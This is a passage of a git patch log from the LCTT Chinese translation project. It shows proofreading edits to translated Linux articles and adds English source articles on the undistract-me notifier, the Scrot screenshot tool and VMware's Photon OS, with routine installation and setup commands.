DuckDuckGo from the Command Line.md index d550fa75b5..48b6fdd830 100644 --- a/translated/tech/20171130 Search DuckDuckGo from the Command Line.md +++ b/translated/tech/20171130 Search DuckDuckGo from the Command Line.md @@ -1,9 +1,11 @@ -# 在命令行中使用DuckDuckGo搜索 - ![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/duckduckgo.png) +在命令行中使用 DuckDuckGo 搜索 +============= -此前我们介绍了[如何在命令行中使用 Google 搜索][3]。许多读者反馈说他们平时使用 [Duck Duck Go][4],一个功能强大而且保密性很强的搜索引擎。 +![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/duckduckgo.png) -正巧,最近出现了一款能够从命令行搜索 DuckDuckGo 的工具。它叫做 ddgr(我把它读作 _dodger_),非常好用。 +此前我们介绍了[如何在命令行中使用 Google 搜索][3]。许多读者反馈说他们平时使用 [Duck Duck Go][4],这是一个功能强大而且保密性很强的搜索引擎。 + +正巧,最近出现了一款能够从命令行搜索 DuckDuckGo 的工具。它叫做 ddgr(我把它读作 “dodger”),非常好用。 像 [Googler][7] 一样,ddgr 是一个完全开源而且非官方的工具。没错,它并不属于 DuckDuckGo。所以,如果你发现它返回的结果有些奇怪,请先询问这个工具的开发者,而不是搜索引擎的开发者。 @@ -11,30 +13,23 @@ ![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/ddgr-gif.gif) -[DuckDuckGo Bangs(DuckDuckGo 快捷搜索)][8] 可以帮助你轻易地在 DuckDuckGo 上找到想要的信息(甚至 _本网站_ 都有快捷搜索)。ddgr 非常忠实地呈现了这个功能。 +[DuckDuckGo Bangs(DuckDuckGo 快捷搜索)][8] 可以帮助你轻易地在 DuckDuckGo 上找到想要的信息(甚至 _本网站 omgubuntu_ 都有快捷搜索)。ddgr 非常忠实地呈现了这个功能。 和网页版不同的是,你可以更改每页返回多少结果。这比起每次查询都要看三十多条结果要方便一些。默认界面经过了精心设计,在不影响可读性的情况下尽量减少了占用空间。 `ddgr` 有许多功能和亮点,包括: * 更改搜索结果数 - * 支持 Bash 自动补全 - * 使用 DuckDuckGo Bangs - * 在浏览器中打开链接 - * ”手气不错“选项 - * 基于时间、地区、文件类型等的筛选功能 - * 极少的依赖项 - 你可以从 Github 的项目页面上下载支持各种系统的 `ddgr`: -[从 Github 下载 “ddgr”][9] +- [从 Github 下载 “ddgr”][9] 另外,在 Ubuntu 16.04 LTS 或更新版本中,你可以使用 PPA 安装 ddgr。这个仓库由 ddgr 的开发者维护。如果你想要保持在最新版本的话,推荐使用这种方式安装。 @@ -44,9 +39,6 @@ ``` sudo add-apt-repository ppa:twodopeshaggy/jarun -``` - -``` sudo apt-get update ``` @@ -89,7 +81,7 @@ via: http://www.omgubuntu.co.uk/2017/11/duck-duck-go-terminal-app 作者:[JOEY SNEDDON][a] 译者:[yixunx](https://github.com/yixunx) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 7e1337cf4adee8590a144a5fa6c3953992c2454b Mon Sep 17 00:00:00 2001 From: wxy Date: Sat, 2 Dec 2017 10:13:12 +0800 Subject: [PATCH 0122/1627] PRF:20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @wangy325 恭喜你,完成了第一篇翻译。翻译很用心! --- ...and Certification Are Key for SysAdmins.md | 52 ++++++++----------- 1 file changed, 23 insertions(+), 29 deletions(-) diff --git a/translated/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md b/translated/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md index 55a42f9289..9b6a4f242c 100644 --- a/translated/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md +++ b/translated/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md @@ -1,71 +1,65 @@ - - -开源云技能认证—系统管理员的核心竞争力 +开源云技能认证:系统管理员的核心竞争力 ========= ![os jobs](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/open-house-sysadmin.jpg?itok=i5FHc3lu "os jobs") -[2017年开源工作报告][1](以下简称“报告”)显示,具有开源云技术认证的系统管理员往往能获得更高的薪酬。报告遵守[CC0][2] *译注1*许可协议。 +> [2017年开源工作报告][1](以下简称“报告”)显示,具有开源云技术认证的系统管理员往往能获得更高的薪酬。 -> 译注1:CC0,即知识/版权共享协议(Creative Commons Zero),任何人都可拷贝,修改,发布,甚至商用作品而无须征求作者许可 -报告调查的受访者中,53%认为系统管理员是雇主们最期望被填补的职位空缺之一,因此,技术娴熟的系统管理员更受青睐而收获高薪职位,但这一职位,并没想象中那么容易胜任。 +报告调查的受访者中,53% 认为系统管理员是雇主们最期望被填补的职位空缺之一,因此,技术娴熟的系统管理员更受青睐而收获高薪职位,但这一职位,并没想象中那么容易填补。 系统管理员主要负责服务器和其他电脑操作系统的安装、服务支持和维护,及时处理服务中断和预防其他问题的出现。 -总的来说,今年的报告指出开源领域人才需求最大的有开源云(47%),应用开发(44%),大数据(43%),开发运营和安全(42%) +总的来说,今年的报告指出开源领域人才需求最大的有开源云(47%),应用开发(44%),大数据(43%),开发运营和安全(42%)。 -此外,报告对人事经理的调查显示,58%期望招揽更多的开源人才,67%认为开源人才的需求增长会比业内其他领域更甚。有些单位视开源人才为招聘最优选则,它们招聘的开源人才较上年增长了2个百分点。 +此外,报告对人事经理的调查显示,58% 期望招揽更多的开源人才,67% 认为开源人才的需求增长会比业内其他领域更甚。有些单位视开源人才为招聘最优选则,它们招聘的开源人才较上年增长了 2 个百分点。 -同时,89%的人事经理认为很难找到颇具天赋的开源人才。 +同时,89% 的人事经理认为很难找到颇具天赋的开源人才。 ### 为什么要获取认证 -报告显示,对系统管理员的需求刺激着人事经理为53%的组织/机构提供正规的培训和专业技术认证,而这一比例去年为47%。 +报告显示,对系统管理员的需求刺激着人事经理为 53% 的组织/机构提供正规的培训和专业技术认证,而这一比例去年为 47%。 -对系统管理方面感兴趣的IT人才考虑获取Linux认证已成为行业规律。随便查看几个知名的招聘网站,你就能发现:[CompTIA Linux+][3]认证是入门Linux系统管理员的必备(最高)认证;如果想胜任高级别的系统管理员职位,获取[红帽认证工程师(RHCE)][4]和[红帽认证系统管理员(RHCSA)][5]则是不可或缺的。 +对系统管理方面感兴趣的 IT 人才考虑获取 Linux 认证已成为行业规律。随便查看几个知名的招聘网站,你就能发现:[CompTIA Linux+][3] 认证是入门级 Linux 系统管理员的最高认证;如果想胜任高级别的系统管理员职位,获取[红帽认证工程师(RHCE)][4]和[红帽认证系统管理员(RHCSA)][5]则是不可或缺的。 -戴士(Dice)[2017技术行业薪资调查][6]显示,2016年系统管理员的薪水为79,538美元,较上年下降了0.8%;系统架构师的薪水为125,946美元,同比下降4.7%。尽管如此,该调查发现“高水平专业人才仍最受欢迎,特别是那些精通支持产业转型发展所需技术的人才”。 +戴士(Dice)[2017 技术行业薪资调查][6]显示,2016 年系统管理员的薪水为 79,538 美元,较上年下降了 0.8%;系统架构师的薪水为 125,946 美元,同比下降 4.7%。尽管如此,该调查发现“高水平专业人才仍最受欢迎,特别是那些精通支持产业转型发展所需技术的人才”。 -在开源技术方面,HBase(一个开源的分布式数据库)技术人才的薪水在戴士2017技术行业薪资调查中排第一。在计算机网络和数据库领域,掌握OpenVSM操作系统技术也能获得高薪。 +在开源技术方面,HBase(一个开源的分布式数据库)技术人才的薪水在戴士 2017 技术行业薪资调查中排第一。在计算机网络和数据库领域,掌握 OpenVMS 操作系统技术也能获得高薪。 ### 成为出色的系统管理员 -出色的系统管理员须在问题出现时马上处理,这意味着你必须时刻准备应对可能出现的状况。这个职位追求“零责备的,精益的,流程或技术上交互式改进的”思维方式和善于自我完善的人格,成为一个系统管理员意味着“你必将与开源软件如Linux,BSD甚至开源Solaris等结下不解的羁绊”,Paul English*译注2*在[开源][7]上发文指出。 +出色的系统管理员须在问题出现时马上处理,这意味着你必须时刻准备应对可能出现的状况。这个职位追求“零责备的、精益的、流程或技术上交互式改进的”思维方式和善于自我完善的人格,成为一个系统管理员意味着“你必将与开源软件如 Linux、BSD 甚至开源 Solaris 等结下不解之缘”,Paul English ^译注1 在 [opensource.com][7] 上发文指出。 -Paul English认为,现在的系统管理员较以前而言,要更多地与软件打交道,而且要能够编写脚本来协助系统管理。 +Paul English 认为,现在的系统管理员较以前而言,要更多地与软件打交道,而且要能够编写脚本来协助系统管理。 ->译注2:Paul English,计算机科学学士,UNIX/Linux 系统管理员,PreOS Security Inc.公司CEO,2015-2017年于为推动系统管理员发展实践的非盈利组织——专业系统管理员联盟(League of Professional System Administrator)担任董事会成员。 +>译注1:Paul English,计算机科学学士,UNIX/Linux 系统管理员,PreOS Security Inc. 公司 CEO,2015-2017 年于为推动系统管理员发展实践的非盈利组织——专业系统管理员联盟League of Professional System Administrator担任董事会成员。 -### 展望2018 +### 展望 2018 - [Robert Half 2018年技术人才薪资导览][8]预测2018年北美地区许多单位将聘用大量系统管理方面的专业人才,同时个人软实力和领导力水平作为优秀人才的考量因素,越来越受到重视。 +[Robert Half 2018 年技术人才薪资导览][8]预测 2018 年北美地区许多单位将聘用大量系统管理方面的专业人才,同时个人软实力和领导力水平作为优秀人才的考量因素,越来越受到重视。 - 报告指出:“良好的聆听能力和批判性思维能力对于理解和解决用户的问题和担忧至关重要,也是IT从业者必须具备的重要技能,特别是从事服务台和桌面支持工作相关的技术人员。” +该报告指出:“良好的聆听能力和批判性思维能力对于理解和解决用户的问题和担忧至关重要,也是 IT 从业者必须具备的重要技能,特别是从事服务台和桌面支持工作相关的技术人员。” - 这与[Linux基金会][9] *译注3* 提出的不同阶段的系统管理员必备技能相一致,都强调了强大的分析能力和快速处理问题的能力。 +这与[Linux基金会][9]^译注2 提出的不同阶段的系统管理员必备技能相一致,都强调了强大的分析能力和快速处理问题的能力。 - >译注3:Linux基金会(The Linux Foundation),成立于2000年,致力于围绕开源项目构建可持续发展的生态系统,以加速开源项目的技术开发和商业应用;它是世界上最大的开源非盈利组织,在推广、保护和推进Linux发展,协同开发,维护“历史上最大的共享资源”上功勋卓越。 - - 如果想逐渐爬上系统管理员职位的金字塔上层,还应该对系统配置的结构化方法充满兴趣;且拥有解决系统安全问题的经验;用户身份验证管理的经验;与非技术人员进行非技术交流的能力;以及优化系统以满足最新的安全需求的能力。 - - [下载][10]*译注4*2017年开源工作报告全文,以获取更多信息。 - ->译注4:可能需要科学上网 +>译注2:Linux 基金会The Linux Foundation,成立于 2000 年,致力于围绕开源项目构建可持续发展的生态系统,以加速开源项目的技术开发和商业应用;它是世界上最大的开源非盈利组织,在推广、保护和推进 Linux 发展,协同开发,维护“历史上最大的共享资源”上功勋卓越。 +如果想逐渐爬上系统管理员职位的金字塔上层,还应该对系统配置的结构化方法充满兴趣;且拥有解决系统安全问题的经验;用户身份验证管理的经验;与非技术人员进行非技术交流的能力;以及优化系统以满足最新的安全需求的能力。 +- [下载][10]2017年开源工作报告全文,以获取更多信息。 ----------------------- via: https://www.linux.com/blog/open-source-cloud-skills-and-certification-are-key-sysadmins -作者:[ ][a] +作者:[linux.com][a] 译者:[wangy325](https://github.com/wangy325) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 +[a]:https://www.linux.com/blog/open-source-cloud-skills-and-certification-are-key-sysadmins [1]:https://www.linuxfoundation.org/blog/2017-jobs-report-highlights-demand-open-source-skills/ [2]:https://www.linux.com/licenses/category/creative-commons-zero [3]:https://certification.comptia.org/certifications/linux?tracking=getCertified/certifications/linux.aspx From b30c38ec59c1151abdd4a80a34b806c409428dbd Mon Sep 17 00:00:00 2001 From: filefi Date: Sat, 2 Dec 2017 13:31:59 +0800 Subject: [PATCH 0123/1627] Update 20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 【申请翻译】How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md --- ...stall and Use Wireshark on Debian and Ubuntu 16.04_17.10.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md b/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md index ce2ed658a4..d3ba75da14 100644 --- a/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md +++ b/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md @@ -1,3 +1,6 @@ +Translating by filefi + + How to Install and Use Wireshark on Debian 9 / Ubuntu 16.04 / 17.10 ============================================================ From 04dacceefc624085b61aca9fdc1c30a3e2e7432e Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 2 Dec 2017 14:54:30 +0800 Subject: [PATCH 0124/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Undistract-me?= =?UTF-8?q?=20:=20Get=20Notification=20When=20Long=20Running=20Terminal=20?= =?UTF-8?q?Commands=20Complete?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Long Running Terminal Commands Complete.md | 154 ++++++++++++++++++ 1 file changed, 154 insertions(+) create mode 100644 sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md diff --git a/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md b/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md new file mode 100644 index 0000000000..e823acbe44 --- /dev/null +++ b/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md @@ -0,0 +1,154 @@ +Undistract-me : Get Notification When Long Running Terminal Commands Complete +============================================================ + +by [sk][2] · November 30, 2017 + +![Undistract-me](https://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2-720x340.png) + +A while ago, we published how to [get notification when a Terminal activity is done][3]. Today, I found out a similar utility called “undistract-me” that notifies you when long running terminal commands complete. Picture this scenario. You run a command that takes a while to finish. In the mean time, you check your facebook and get so involved in it. After a while, you remembered that you ran a command few minutes ago. You go back to the Terminal and notice that the command has already finished. But you have no idea when the command is completed. Have you ever been in this situation? I bet most of you were in this situation many times. This is where “undistract-me” comes in help. You don’t need to constantly check the terminal to see if a command is completed or not. Undistract-me utility will notify you when a long running command is completed. It will work on Arch Linux, Debian, Ubuntu and other Ubuntu-derivatives. + +#### Installing Undistract-me + +Undistract-me is available in the default repositories of Debian and its variants such as Ubuntu. All you have to do is to run the following command to install it. + +``` +sudo apt-get install undistract-me +``` + +The Arch Linux users can install it from AUR using any helper programs. + +Using [Pacaur][4]: + +``` +pacaur -S undistract-me-git +``` + +Using [Packer][5]: + +``` +packer -S undistract-me-git +``` + +Using [Yaourt][6]: + +``` +yaourt -S undistract-me-git +``` + +Then, run the following command to add “undistract-me” to your Bash. + +``` +echo 'source /etc/profile.d/undistract-me.sh' >> ~/.bashrc +``` + +Alternatively you can run this command to add it to your Bash: + +``` +echo "source /usr/share/undistract-me/long-running.bash\nnotify_when_long_running_commands_finish_install" >> .bashrc +``` + +If you are in Zsh shell, run this command: + +``` +echo "source /usr/share/undistract-me/long-running.bash\nnotify_when_long_running_commands_finish_install" >> .zshrc +``` + +Finally update the changes: + +For Bash: + +``` +source ~/.bashrc +``` + +For Zsh: + +``` +source ~/.zshrc +``` + +#### Configure Undistract-me + +By default, Undistract-me will consider any command that takes more than 10 seconds to complete as a long-running command. You can change this time interval by editing /usr/share/undistract-me/long-running.bash file. + +``` +sudo nano /usr/share/undistract-me/long-running.bash +``` + +Find “LONG_RUNNING_COMMAND_TIMEOUT” variable and change the default value (10 seconds) to something else of your choice. + + [![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-1.png)][7] + +Save and close the file. Do not forget to update the changes: + +``` +source ~/.bashrc +``` + +Also, you can disable notifications for particular commands. To do so, find the “LONG_RUNNING_IGNORE_LIST” variable and add the commands space-separated like below. + +By default, the notification will only show if the active window is not the window the command is running in. That means, it will notify you only if the command is running in the background Terminal window. If the command is running in active window Terminal, you will not be notified. If you want undistract-me to send notifications either the Terminal window is visible or in the background, you can set IGNORE_WINDOW_CHECK to 1 to skip the window check. + +The other cool feature of Undistract-me is you can set audio notification along with visual notification when a command is done. By default, it will only send a visual notification. You can change this behavior by setting the variable UDM_PLAY_SOUND to a non-zero integer on the command line. However, your Ubuntu system should have pulseaudio-utils and sound-theme-freedesktop utilities installed to enable this functionality. + +Please remember that you need to run the following command to update the changes made. + +For Bash: + +``` +source ~/.bashrc +``` + +For Zsh: + +``` +source ~/.zshrc +``` + +It is time to verify if this really works. + +#### Get Notification When Long Running Terminal Commands Complete + +Now, run any command that takes longer than 10 seconds or the time duration you defined in Undistract-me script. + +I ran the following command on my Arch Linux desktop. + +``` +sudo pacman -Sy +``` + +This command took 32 seconds to complete. After the completion of the above command, I got the following notification. + + [![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2.png)][8] + +Please remember Undistract-me script notifies you only if the given command took more than 10 seconds to complete. If the command is completed in less than 10 seconds, you will not be notified. Of course, you can change this time interval settings as I described in the Configuration section above. + +I find this tool very useful. It helped me to get back to the business after I completely lost in some other tasks. I hope this tool will be helpful to you too. + +More good stuffs to come. Stay tuned! + +Cheers! + +Resource: + +* [Undistract-me GitHub Repository][1] + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/undistract-get-notification-long-running-terminal-commands-complete/ + +作者:[ ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com/author/sk/ +[1]:https://github.com/jml/undistract-me +[2]:https://www.ostechnix.com/author/sk/ +[3]:https://www.ostechnix.com/get-notification-terminal-task-done/ +[4]:https://www.ostechnix.com/install-pacaur-arch-linux/ +[5]:https://www.ostechnix.com/install-packer-arch-linux-2/ +[6]:https://www.ostechnix.com/install-yaourt-arch-linux/ +[7]:http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-1.png +[8]:http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2.png From 43547f1f71c845662f0ed2a0ae67d7e1fda7c19d Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 2 Dec 2017 14:57:25 +0800 Subject: [PATCH 0125/1627] =?UTF-8?q?=E8=A1=A5=E5=85=85author=20name?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Notification When Long Running Terminal Commands Complete.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md b/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md index e823acbe44..04f07c308c 100644 --- a/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md +++ b/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md @@ -137,7 +137,7 @@ Resource: via: https://www.ostechnix.com/undistract-get-notification-long-running-terminal-commands-complete/ -作者:[ ][a] +作者:[sk][a] 译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID) From 53cb9dfea6cfd18c3f3e4f1eb851a791c69d327a Mon Sep 17 00:00:00 2001 From: filefi Date: Sat, 2 Dec 2017 15:03:39 +0800 Subject: [PATCH 0126/1627] Create 20171202 Scrot Linux command-line screen grabs made simple --- ...inux command-line screen grabs made simple | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 sources/tech/20171202 Scrot Linux command-line screen grabs made simple diff --git a/sources/tech/20171202 Scrot Linux command-line screen grabs made simple b/sources/tech/20171202 Scrot Linux command-line screen grabs made simple new file mode 100644 index 0000000000..979ed86b3c --- /dev/null +++ b/sources/tech/20171202 Scrot Linux command-line screen grabs made simple @@ -0,0 +1,72 @@ +Translating by filefi + +# Scrot: Linux command-line screen grabs made simple + +by [Scott Nesbitt][a] · November 30, 2017 + +> Scrot is a basic, flexible tool that offers a number of handy options for taking screen captures from the Linux command line. + +[![Original photo by Rikki Endsley. CC BY-SA 4.0](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/community-penguins-osdc-lead.png?itok=BmqsAF4A)][1] + + + +There are great tools on the Linux desktop for taking screen captures, such as [KSnapshot][2] and [Shutter][3]. Even the simple utility that comes with the GNOME desktop does a pretty good job of capturing screens. But what if you rarely need to take screen captures? Or you use a Linux distribution without a built-in capture tool, or an older computer with limited resources? + +Turn to the command line and a little utility called [Scrot][4]. It does a fine job of taking simple screen captures, and it includes a few features that might surprise you. + +### Getting started with Scrot +Many Linux distributions come with Scrot already installed—to check, type `which scrot`. If it isn't there, you can install Scrot using your distro's package manager. If you're willing to compile the code, grab it [from GitHub][5]. + +To take a screen capture, crack open a terminal window and type `scrot [filename]`, where `[filename]` is the name of file to which you want to save the image (for example, `desktop.png`). If you don't include a name for the file, Scrot will create one for you, such as `2017-09-24-185009_1687x938_scrot.png`. (That filename isn't as descriptive it could be, is it? That's why it's better to add one to the command.) + +Running Scrot with no options takes a screen capture of your entire desktop. If you don't want to do that, Scrot lets you focus on smaller portions of your screen. + +### Taking a screen capture of a single window + +Tell Scrot to take a screen capture of a single window by typing `scrot -u [filename]`. + +The `-u` option tells Scrot to grab the window currently in focus. That's usually the terminal window you're working in, which might not be the one you want. + +To grab another window on your desktop, type `scrot -s [filename]`. + +The `-s` option lets you do one of two things: + +* select an open window, or + +* draw a rectangle around a window or a portion of a window to capture it. + +You can also set a delay, which gives you a little more time to select the window you want to capture. To do that, type `scrot -u -d [num] [filename]`. + +The `-d` option tells Scrot to wait before grabbing the window, and `[num]` is the number of seconds to wait. Specifying `-d 5` (wait five seconds) should give you enough time to choose a window. + +### More useful options + +Scrot offers a number of additional features (most of which I never use). The ones I find most useful include: + +* `-b` also grabs the window's border + +* `-t` grabs a window and creates a thumbnail of it. This can be useful when you're posting screen captures online. + +* `-c` creates a countdown in your terminal when you use the `-d` option. + +To learn about Scrot's other options, check out the its documentation by typing `man scrot` in a terminal window, or [read it online][6]. Then start snapping images of your screen. + +It's basic, but Scrot gets the job done nicely. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot + +作者:[Scott Nesbitt][a] +译者:[filefi](https://github.com/filefi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/scottnesbitt +[1]:https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/community-penguins-osdc-lead.png?itok=BmqsAF4A +[2]:https://www.kde.org/applications/graphics/ksnapshot/ +[3]:https://launchpad.net/shutter +[4]:https://github.com/dreamer/scrot +[5]:http://manpages.ubuntu.com/manpages/precise/man1/scrot.1.html +[6]:https://github.com/dreamer/scrot From 37918a23787d8bbe185e741dd28c67e9db12869b Mon Sep 17 00:00:00 2001 From: geekpi Date: Sat, 2 Dec 2017 18:19:16 +0800 Subject: [PATCH 0127/1627] tranlsating --- ...Notification When Long Running Terminal Commands Complete.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md b/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md index 04f07c308c..46afe9b893 100644 --- a/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md +++ b/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md @@ -1,3 +1,5 @@ +translating---geekpi + Undistract-me : Get Notification When Long Running Terminal Commands Complete ============================================================ From 9e364e66e6b4ae58ea230598d9d585e49492c329 Mon Sep 17 00:00:00 2001 From: nodekey Date: Sat, 2 Dec 2017 20:15:32 +0800 Subject: [PATCH 0128/1627] translated --- ...Could Be Your New Favorite Container OS.md | 149 ------------------ ...Could Be Your New Favorite Container OS.md | 147 +++++++++++++++++ 2 files changed, 147 insertions(+), 149 deletions(-) delete mode 100644 sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md create mode 100644 translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md diff --git a/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md b/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md deleted file mode 100644 index 147a2266cc..0000000000 --- a/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md +++ /dev/null @@ -1,149 +0,0 @@ -KeyLD Translating - -Photon Could Be Your New Favorite Container OS -============================================================ - - -![Photon OS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon-linux.jpg?itok=jUFHPR_c "Photon OS") -Jack Wallen says Photon OS is an outstanding platform, geared specifically for containers.[Creative Commons Zero][5]Pixabay - -Containers are all the rage, and with good reason. [As discussed previously][13], containers allow you to quickly and easily deploy new services and applications onto your network, without requiring too much in the way of added system resources. Containers are more cost-effective than using dedicated hardware or virtual machines, and they’re easier to update and reuse. - -Best of all, containers love Linux (and vice versa). Without much trouble or time, you can get a Linux server up and running with [Docker][14] and deploying containers. But, which Linux distribution is best suited for the deployment of your containers? There are a _lot_  of options. You could go with a standard Ubuntu Server platform (which makes installing Docker and deploying containers incredibly easy), or you could opt for a lighter weight distribution — one geared specifically for the purpose of deploying containers. - -One such distribution is [Photon][15]. This particular platform was created in 2005 by [VMware][16]; it includes the Docker daemon and works with container frameworks, such as Mesos and Kubernetes. Photon is optimized to work with [VMware vSphere][17], but it can be used on bare metal, [Microsoft Azure][18], [Google Compute Engine][19], [Amazon Elastic Compute Cloud][20], or [VirtualBox][21]. - -Photon manages to stay slim by only installing what is absolutely necessary to run the Docker daemon. In the end, the distribution comes in around 300 MB. This is just enough Linux make it all work. The key features to Photon are: - -* Kernel tuned for performance. - -* Kernel is hardened according to the [Kernel Self-Protection Project][6] (KSPP). - -* All installed packages are built with hardened security flags. - -* Operating system boots with validated trust. - -* Photon management daemon manages firewall, network, packages, and users on remote Photon OS machines. - -* Support for persistent volumes. - -* [Project Lightwave][7] integration. - -* Timely security patches and updates. - -Photon can be used via [ISO][22], [OVA][23], [Amazon Machine Image][24], [Google Compute Engine image][25], and [Azure VHD][26]. I’ll show you how to install Photon on VirtualBox, using an ISO image. The installation takes about five minutes and, in the end, you’ll have a virtual machine, ready to deploy containers. - -### Creating the virtual machine - -Before you deploy that first container, you have to create the virtual machine and install Photon. To do this, open up VirtualBox and click the New button. Walk through the Create Virtual Machine wizard (giving Photon the necessary resources, based on the usage you predict the container server will need). Once you’ve created the virtual machine, you need to first make a change to the settings. Select the newly created virtual machine (in the left pane of the VirtualBox main window) and then click Settings. In the resulting window, click on Network (from the left navigation). - -In the Networking window (Figure 1), you need to change the Attached to drop-down to Bridged Adapter. This will ensure your Photon server is reachable from your network. Once you’ve made that change, click OK. - -### [photon_0.jpg][8] - -![change settings](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_0.jpg?itok=Q0yhOhsZ "change settings") -Figure 1: Changing the VirtualBox network settings for Photon.[Used with permission][1] - -Select your Photon virtual machine from the left navigation and then click Start. You will be prompted to locate and attach the IOS image. Once you’ve done that, Photon will boot up and prompt you to hit Enter to begin the installation. The installation is ncurses based (there is no GUI), but it’s incredibly simple. - -In the next screen (Figure 2), you will be asked if you want to do a Minimal, Full, or OSTree Server. I opted to go the Full route. Select whichever option you require and hit enter. - -### [photon_1.jpg][9] - -![installation type](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_1.jpg?itok=OdnMVpaA "installation type") -Figure 2: Selecting your installation type.[Used with permission][2] - -In the next window, select the disk that will house Photon. Since we’re installing this as a virtual machine, there will be only one disk listed (Figure 3). Tab down to Auto and hit Enter on your keyboard. The installation will then require you to type (and verify) an administrator password. Once you’ve done that, the installation will begin and finish in less than five minutes. - -### [photon_2.jpg][10] - -![Photon ](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_2.jpg?itok=QL1Rs-PH "Photon") -Figure 3: Selecting your hard disk for the Photon installation.[Used with permission][3] - -Once the installation completes, reboot the virtual machine and log in with the username root and the password you created during installation. You are ready to start working. - -Before you begin using Docker on Photon, you’ll want to upgrade the platform. Photon uses the _yum_ package manager, so login as root and issue the command  _yum update_ .If there are any updates available, you’ll be asked to okay the process (Figure 4). - -### [photon_3.jpg][11] - -![Updating](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_3.jpg?itok=vjqrspE2 "Updating") -Figure 4: Updating Photon.[Used with permission][4] - -Usage - -As I mentioned, Photon comes with everything you need to deploy containers or even create a Kubernetes cluster. However, out of the box, there are a few things you’ll need to do. The first thing is to enable the Docker daemon to run at start. To do this, issue the commands: - -``` -systemctl start docker - -systemctl enable docker -``` - -Now we need to create a standard user, so we’re not running the docker command as root. To do this, issue the following commands: - -``` -useradd -m USERNAME - -passwd USERNAME -``` - -Where USERNAME is the name of the user to add. - -Next we need to add the new user to the  _docker_ group with the command: - -``` -usermod -a -G docker USERNAME -``` - -Where USERNAME is the name of the user just created. - -Log out as the root user and log back in as the newly created user. You can now work with the  _docker _ command without having to make use of  _sudo_  or switching to the root user. Pull down an image from Docker Hub and start deploying containers. - -### An outstanding container platform - -Photon is, without a doubt, an outstanding platform, geared specifically for containers. Do note that Photon is an open source project, so there is no paid support to be had. If you find 